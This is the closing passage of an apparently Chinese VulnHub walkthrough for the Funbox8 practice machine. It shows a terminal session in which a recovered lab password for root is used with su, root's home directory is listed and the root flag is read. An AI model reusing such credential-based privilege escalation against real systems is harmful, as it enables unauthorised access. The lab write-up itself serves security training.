The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Sat May 22 16:03:57 2021 from 192.168.178.143
john@funbox8:~$

8.2、SSH 登录 jules 用户

略过

9、尝试切换 root 用户

  • root : zhnmju!!!
john@funbox8:~$ su root
Password: 
root@funbox8:/home/john# cd ~
root@funbox8:~# ls -al
total 52
drwx------  4 root root  4096 May 22  2021 .
drwxr-xr-x 20 root root  4096 May 22  2021 ..
-rw-------  1 root root   238 May 22  2021 .bash_history
-rw-r--r--  1 root root  3106 Dec  5  2019 .bashrc
-rw-r--r--  1 root root   161 Dec  5  2019 .profile
-rw-r--r--  1 root root   369 May 22  2021 root.flag
-rwxr-xr-x  1 root root    35 May 22  2021 run.sh
drwxr-xr-x  3 root root  4096 May 22  2021 snap
drwx------  2 root root  4096 May 22  2021 .ssh
-rw-------  1 root root 15427 May 22  2021 .viminfo
root@funbox8:~# cat root.flag
|~~          |           |              |    |              |         
|--|   ||/~\ |~~\/~\\/o  | |   ||/~\ /~~|/~\ |~~\|/~\/~//~~||_//~/|/~\
|   \_/||   ||__/\_//\o  |__\_/||   |\__|   ||__/|   \/_\__|| \\/_|   
                                                                    
created by @0815R2d2.

Congrats ! I look forward to see this on my twitter-account :-)
root@funbox8:~#

你可能感兴趣的:(VulnHub,渗透靶场)